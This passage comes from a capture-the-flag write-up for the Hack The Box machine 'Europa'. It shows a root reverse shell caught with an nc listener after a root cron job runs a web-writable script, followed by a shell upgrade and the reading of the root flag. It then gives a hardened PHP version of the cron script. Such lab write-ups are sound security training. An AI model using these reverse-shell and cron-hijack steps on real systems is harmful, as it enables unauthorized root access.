-rwxr-xr-x 1 www-data www-data 79 May 10 21:29 /var/www/cmd/logcleared.sh
In less than a minute, our root shell is opened.
u505@kali:~/HTB/Machines/Europa$ rlwrap nc -lnvp 4446
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
Ncat: Connection from 10.10.10.22.
Ncat: Connection from 10.10.10.22:60978.
/bin/sh: 0: can't access tty; job control turned off
# python3 -c "import pty;pty.spawn('/bin/bash')"
root@europa:~# id
id
uid=0(root) gid=0(root) groups=0(root)
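The root cause of this escalation is a root cronjob executing a script from a directory the web user can write to. As an added example (not the box's own file), here is a hardened replacement for the clearlogs script above that refuses to run the hook unless root owns it and every directory above it, none of them writable by others. It assumes the script runs from root's crontab with the same paths as the original.

```php
#!/usr/bin/php
<?php
// Added example: a hardened replacement for the clearlogs cron script shown
// above, not the box's own file. The original, run by root every minute,
// exec()s /var/www/cmd/logcleared.sh from a directory www-data can write to,
// which is exactly the path used for the root shell. This version refuses to
// run a hook unless root owns it and every directory above it, and none of
// them is group- or world-writable. Assumption: the script runs from root's
// crontab as on the box; the paths are the ones in the original file.

const LOG_FILE = '/var/www/admin/logs/access.log';
const HOOK     = '/var/www/cmd/logcleared.sh';

// True only if $path is owned by uid 0 and has neither g+w nor o+w.
function owned_and_locked_by_root(string $path): bool
{
    $st = @lstat($path);
    if ($st === false || $st['uid'] !== 0) {
        return false;
    }
    return ($st['mode'] & 0022) === 0;
}

// A hook is safe to run as root only if the file itself and every parent
// directory pass the check: a writable parent lets another user replace the
// file (rename, or a symlink pointing elsewhere), so looking at the file
// alone is not enough. The check-then-exec window still exists; the real fix
// is to keep the hook in a root-owned location in the first place.
function safe_to_run_as_root(string $path): bool
{
    if ($path === '' || $path[0] !== '/' || realpath($path) !== $path || !is_file($path)) {
        return false;        // must be an absolute, canonical path to a regular file
    }
    for ($p = $path; $p !== '/'; $p = dirname($p)) {
        if (!owned_and_locked_by_root($p)) {
            return false;
        }
    }
    return owned_and_locked_by_root('/');
}

// Truncate the log only if it is a regular file: a root process following a
// symlink planted by the web user would empty whatever the link points to.
if (is_file(LOG_FILE) && !is_link(LOG_FILE)) {
    file_put_contents(LOG_FILE, '');
}

if (safe_to_run_as_root(HOOK)) {
    exec(escapeshellarg(HOOK), $output, $rc);
    if ($rc !== 0) {
        error_log('clearlogs: ' . HOOK . " exited with status $rc");
    }
} else {
    // On the box this branch fires: the hook is owned by www-data (see ls -l above).
    error_log('clearlogs: refusing to exec ' . HOOK . ' (not root-owned or writable by others)');
}
```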
Root Flag
root@europa:~# cat /root/root.txt
cat /root/root.txt
<ROOT_FLAG>
References
- Exploiting PHP PCRE Functions
- https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace
Daniel Simao 09:16, 10 May 2020 (EDT)